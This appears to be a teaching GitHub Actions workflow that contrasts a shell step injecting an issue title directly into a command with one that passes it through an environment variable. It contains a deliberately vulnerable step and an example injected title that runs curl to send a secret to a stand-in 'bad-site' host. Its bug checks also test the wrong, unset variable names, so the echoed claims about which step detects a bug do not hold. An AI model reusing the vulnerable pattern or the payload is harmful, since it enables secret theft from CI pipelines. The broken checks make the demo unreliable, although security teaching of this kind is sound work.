name: Demo - script injection threat
on:
  #  issues:
  #    types:
  #      - opened
  #      - reopened
  workflow_dispatch:
jobs:
  workflow-description:
    runs-on: ubuntu-latest
    steps:
      - name: Print workflow description
        run: |
          echo ---
          echo This is an example how script injection vulnerability can happen
          echo The workflow starts on Open/Reopen an issue 
          echo We can name the issue, e.g.':' 'a";echo !!! I have bugexecuted a script !!!"'
          echo As a result, the echo command script can be unintentionally executed
          echo One of the jobs is protected, the other is not.  
          echo ---
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - name: Vulnerable step - executing title as command
        run: |
          echo ---
          echo Here we insert title directly to shell command
          echo As a result, the \'echo\' text is considered as a command and executed
          echo "(and btw issue WILL NOT be identified as bug - because" \'bugexecuted\' "is in another command)" 
          echo Now imagine if the issue name was':' 'a"; curl http://bad-site/steal-secret/$MY_SECRET'
          echo ---
          TITLE="${{github.event.issue.title}}"
          echo "Issue title = $TITLE"
          if [[ "$title" == *"bug"* ]]; 
          then
            echo "Issue is a bug"
          else
            echo "Issue is NOT a bug"
          fi
      - name: Protected step - setting title as environment variable first
        env:
          ISSUE_TITLE: ${{github.event.issue.title}}
        run: |
          echo ---
          echo Here we first set title as environment variable
          echo Because of that the shell will treat it as text only
          echo Now the script in the title will not be executed
          echo "(and the issue WILL be identified as bug because" \'bugexecuted\' "is also a part of the title)"
          echo ---
          echo "Issue title = $ISSUE_TITLE"
          if [[ "$TITLE" == *"bug"* ]]; 
          then
            echo "Issue is a bug"
          else
            echo "Issue is NOT a bug"
          fi
